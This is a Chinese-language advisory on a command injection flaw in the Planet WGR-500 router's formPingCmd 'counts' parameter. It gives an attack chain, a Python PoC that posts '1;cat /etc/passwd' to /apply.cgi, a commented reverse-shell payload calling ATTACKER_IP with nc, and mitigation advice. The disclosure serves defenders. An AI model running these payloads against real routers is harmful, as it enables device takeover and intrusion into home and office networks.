CVE-2025-54406 Planet WGR-500 路由器命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-54406

漏洞类型

操作系统命令注入（OS Command Injection）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Planet WGR-500 路由器

漏洞概述

CVE-2025-54406是Planet WGR-500路由器（固件版本v1.3411b190912）中存在的一个高危操作系统命令注入漏洞。该漏洞存在于设备的formPingCmd功能模块中，攻击者可以通过精心构造的一系列HTTP请求，利用`counts`请求参数注入任意操作系统命令，从而实现远程命令执行。该漏洞由思科Talos安全团队发现并报告，CVSS 3.1评分为8.8分，属于高危级别。由于该漏洞仅需要低权限认证即可利用，且无需用户交互，攻击者可以在网络上远程发起攻击，对设备的机密性、完整性和可用性均造成严重影响。受影响的设备主要用于家庭和小型办公网络环境，一旦被攻陷，攻击者可以完全控制路由器，进而对内网设备进行进一步攻击、数据窃取或网络流量劫持。该漏洞的披露时间为2025年10月7日，目前尚未公开针对该漏洞的官方补丁信息，设备管理员应密切关注厂商发布的安全更新。

技术细节

Planet WGR-500路由器的formPingCmd功能模块用于处理ping诊断请求。在该功能的实现中，程序未能对用户通过HTTP请求传入的`counts`参数进行充分的输入验证和过滤。攻击者可以通过在`counts`参数中注入shell元字符（如分号`;`、管道符`|`、反引号`` ` ``、$()等），将恶意命令拼接到系统调用中执行。

具体利用方式如下：
1. 攻击者首先需要获取路由器的有效登录凭据（低权限账户即可）；
2. 构造包含恶意payload的HTTP请求，发送到formPingCmd接口；
3. 在`counts`参数中注入命令，例如：`counts=1;cat /etc/passwd`；
4. 服务器端将未经过滤的参数拼接到系统命令中执行；
5. 攻击者的恶意命令以路由器的权限被执行。

由于该漏洞需要低权限认证（PR:L），攻击者需要先通过其他途径获取设备的有效凭据，或者利用设备可能存在的默认密码/弱密码。一旦成功利用，攻击者可以以root权限执行任意系统命令，完全控制设备。该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H，表明这是一个网络可利用、低复杂度、但需要认证的漏洞。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络扫描或社工手段识别目标网络中存在Planet WGR-500路由器设备，并尝试获取设备的登录凭据（如默认密码、弱密码或通过钓鱼等方式获取合法凭据）。

STEP 2

步骤2：身份认证

攻击者使用获取的低权限账户凭据登录路由器的管理界面，建立有效的会话（Session）。该漏洞仅需要低权限认证即可利用。

STEP 3

步骤3：构造恶意请求

攻击者构造包含恶意payload的HTTP POST请求，目标是formPingCmd功能接口。在`counts`参数中注入操作系统命令分隔符（如分号`;`）和恶意命令。

STEP 4

步骤4：发送攻击请求

攻击者将构造好的恶意HTTP请求发送到路由器的formPingCmd处理端点（如/apply.cgi），触发服务器端对未过滤参数的命令拼接执行。

STEP 5

步骤5：命令执行与控制

恶意命令以路由器系统权限执行，攻击者获得设备的完全控制权，可以进行数据窃取、植入后门、修改路由配置或对内网进行横向渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54406 - Planet WGR-500 formPingCmd Command Injection PoC
# Vulnerability: OS Command Injection via 'counts' parameter in formPingCmd
# CVSS: 8.8 (HIGH)

import requests
from requests.auth import HTTPBasicAuth

TARGET_HOST = "http://192.168.1.1"
USERNAME = "admin"      # Replace with valid low-privilege credentials
PASSWORD = "password"   # Replace with valid password

# Step 1: Create a session and authenticate
session = requests.Session()
login_url = f"{TARGET_HOST}/login.cgi"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}

try:
    # Perform login
    resp = session.post(login_url, data=login_data, timeout=10)
    print(f"[*] Login response status: {resp.status_code}")

    # Step 2: Exploit the command injection via formPingCmd endpoint
    # The 'counts' parameter is vulnerable to OS command injection
    exploit_url = f"{TARGET_HOST}/apply.cgi"

    # Inject arbitrary command after the legitimate ping count value
    # Example: read /etc/passwd file
    payload = "1;cat /etc/passwd"

    exploit_data = {
        "formPingCmd": "1",
        "counts": payload,       # Vulnerable parameter
        "pingAddr": "127.0.0.1"
    }

    print(f"[*] Sending exploit with payload in 'counts' parameter...")
    resp = session.post(exploit_url, data=exploit_data, timeout=10)

    print(f"[*] Response status: {resp.status_code}")
    print(f"[*] Response body:\n{resp.text}")

    # Alternative payloads for demonstration:
    # Reverse shell: counts=1;nc -e /bin/sh ATTACKER_IP 4444
    # Command execution: counts=1;id
    # File write: counts=1;echo 'pwned' > /tmp/pwned

except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

影响范围

Planet WGR-500 v1.3411b190912

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）立即修改路由器的默认管理密码，使用包含大小写字母、数字和特殊字符的强密码；2）限制管理界面的网络访问，将管理访问限制在可信的内部IP地址范围内，避免从互联网直接暴露管理端口；3）监控路由器日志，关注formPingCmd相关接口的异常请求，特别是包含shell元字符（;、|、&、$()等）的请求；4）如设备支持，禁用或限制ping诊断功能的使用；5）在网络边界部署防火墙规则，阻止来自外部网络的针对路由器管理端口的访问请求；6）考虑将受影响的设备替换为已修复漏洞的新版本固件或更换为其他安全状态更好的设备。